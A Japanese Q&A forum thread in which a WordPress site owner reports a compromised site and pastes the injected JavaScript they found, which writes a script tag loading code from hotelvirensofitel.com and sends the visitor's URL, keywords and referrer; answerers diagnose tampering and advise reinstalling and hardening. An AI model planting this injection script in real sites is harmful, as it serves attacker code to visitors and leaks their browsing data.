質問をすることでしか得られない、回答やアドバイスがある。

15分調べてもわからないことは、質問しよう!

ただいまの
回答率

88.23%

WordPressにプラグインを入れた後、画面がまっしろになり、「hotelvirensofitel.comを待機しています…」というメッセージが出るようになった

解決済

回答 2

投稿

  • 評価
  • クリップ 0
  • VIEW 1,225

piyo-piyo

score 17

前提・問題

WordPressサイトを、Mesocolumnというテンプレで作っておりましたが、
ある日、top画面がまっしろに表示がされました。

試したこと

1. wp-config.phpのDEBUGモードをfalseからtrueにして、エラーを確認したところ、
直前で入れていたfavicon rotatorが問題であったようだったので、
プラグインを停止したところ、画面は表示されるようになりました。
(※今ではどういうメッセージが出ていたのか、わからないのですが…)

2.そうしたところ、「wp-content/db.php」の一行目にエラーが発生しているというメッセージが出たため、
wp-content直下にあったdb.phpを見てみると、1行目は、「<?php」のみでした。

3.インターネットでdb.phpのエラーを検索すると、ファイル自体を削除することで解決している人がいたため
db.phpの名前をdb_old.phpにサーバー上で変更

4.TOPページにはエラーが表示されなくなりましたが、管理画面側でちょいちょいエラーが出るようになってしまったので初心者的にはWordPressを再インストールした方がよいかと思い、週末を待っておりました。

5.昨晩、該当URLにアクセスすると、ブラウザ左下に「hotelvirensofitel.comを待機しています…」というメッセージが出ていることに気が付きました。デベロッパーツールで確認をすると、javascriptが書き込まれていることに気が付きました(発生している問題・エラーメッセージに書きました)

6.今朝、該当URLにアクセスすると、以下の画像が表示されました。
イメージ説明

以上が、実施してみたことになりますが、WordPressを再インストールすればよい話なのか、もはやそれだけではない問題なのか、そもそもどうしてこうなったのか(どうするべきであったのか)、ご教示頂ければ幸いです。

発生している問題・エラーメッセージ

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://hotelvirensofitel.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'snt2014' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

補足情報

ちなみに当方はMac歴1ヶ月程度。友人には、MacはこまめにPCの再起動を行えば、再起動時に悪意のあるマルウェアなどは削除する仕様…と言われたので、ウィルス対策ソフトなどは入れておりません。

  • 気になる質問をクリップする

    クリップした質問は、後からいつでもマイページで確認できます。

    またクリップした質問に回答があった際、通知やメールを受け取ることができます。

    クリップを取り消します

  • 良い質問の評価を上げる

    以下のような質問は評価を上げましょう

    • 質問内容が明確
    • 自分も答えを知りたい
    • 質問者以外のユーザにも役立つ

    評価が高い質問は、TOPページの「注目」タブのフィードに表示されやすくなります。

    質問の評価を上げたことを取り消します

  • 評価を下げられる数の上限に達しました

    評価を下げることができません

    • 1日5回まで評価を下げられます
    • 1日に1ユーザに対して2回まで評価を下げられます

    質問の評価を下げる

    teratailでは下記のような質問を「具体的に困っていることがない質問」、「サイトポリシーに違反する質問」と定義し、推奨していません。

    • プログラミングに関係のない質問
    • やってほしいことだけを記載した丸投げの質問
    • 問題・課題が含まれていない質問
    • 意図的に内容が抹消された質問
    • 過去に投稿した質問と同じ内容の質問
    • 広告と受け取られるような投稿

    評価が下がると、TOPページの「アクティブ」「注目」タブのフィードに表示されにくくなります。

    質問の評価を下げたことを取り消します

    この機能は開放されていません

    評価を下げる条件を満たしてません

    評価を下げる理由を選択してください

    詳細な説明はこちら

    上記に当てはまらず、質問内容が明確になっていない質問には「情報の追加・修正依頼」機能からコメントをしてください。

    質問の評価を下げる機能の利用条件

    この機能を利用するためには、以下の事項を行う必要があります。

回答 2

checkベストアンサー

+4

現物を見ていないので確定的なことはいえませんが、WordPressが改ざんされた危険性があります。

日ごとに状況が変わっているということは、すでに誰かがあなたのWordPressで好き放題できるルートを作っている可能性も高いので、一度完全に新しいWordPressを入れることをおすすめします。

なお、WordPressへの侵入は多くの場合、WordPress自体やプラグインの脆弱性を使って行われるので、「パソコンにウイルス対策ソフトを入れた」ところで、まったく防御にはなりません。WordPressをこまめにアップデートする、というのが適切な方法です。

投稿

  • 回答の評価を上げる

    以下のような回答は評価を上げましょう

    • 正しい回答
    • わかりやすい回答
    • ためになる回答

    評価が高い回答ほどページの上位に表示されます。

  • 回答の評価を下げる

    下記のような回答は推奨されていません。

    • 間違っている回答
    • 質問の回答になっていない投稿
    • スパムや攻撃的な表現を用いた投稿

    評価を下げる際はその理由を明確に伝え、適切な回答に修正してもらいましょう。

  • 2016/12/03 11:26

    maisumakunさん、

    ご回答ありがとうございます。
    WordPressの改ざんなのですね。。。

    同じサーバー(ロリポ)に入っている他のサイトも見てみましたら、
    WordPressのサイトは、同じような改ざんをされておりました…(T T)

    これを機会に、改ざんされにくい対策などを、講じたいと思います。
    ありがとうございました!!

    キャンセル

+1

MacはこまめにPCの再起動を行えば、再起動時に悪意のあるマルウェアなどは削除する仕様

10年以上仕事でMacをさわっていますが、上記のようなことは聞いた事がありません。セキュリティソフト自体そこまで高価でもないので、導入されることをお勧めします。

また、全ファイルの削除だけでなく、DB内のデータの削除及びDBのパスワード変更などもされたほうが良いです。

投稿

  • 回答の評価を上げる

    以下のような回答は評価を上げましょう

    • 正しい回答
    • わかりやすい回答
    • ためになる回答

    評価が高い回答ほどページの上位に表示されます。

  • 回答の評価を下げる

    下記のような回答は推奨されていません。

    • 間違っている回答
    • 質問の回答になっていない投稿
    • スパムや攻撃的な表現を用いた投稿

    評価を下げる際はその理由を明確に伝え、適切な回答に修正してもらいましょう。

  • 2016/12/03 18:24

    kei344さん、
    アドバイスありがとうございます!
    セキュリティソフト是非検討します。

    「全ファイルの削除だけでなく、DB内のデータ削除」とは、「WordPress内の」ということでしょうか?再インストールはしてみたいとおもっておりますが、もしよろしければもう少し詳しめにお教え頂けますととてもうれしいです。

    キャンセル

  • 2016/12/04 01:11

    「WordPress内の」が具体的に何を指しているかはわかりませんが、「WordPressがDBにアクセスするためのID/Passで入れるDB」のテーブル全てについて、書き換えられていない保障がありません。

    キャンセル

15分調べてもわからないことは、teratailで質問しよう!

  • ただいまの回答率 88.23%
  • 質問をまとめることで、思考を整理して素早く解決
  • テンプレート機能で、簡単に質問をまとめられる

関連した質問

同じタグがついた質問を見る

  • トップ
  • WordPressに関する質問
  • WordPressにプラグインを入れた後、画面がまっしろになり、「hotelvirensofitel.comを待機しています…」というメッセージが出るようになった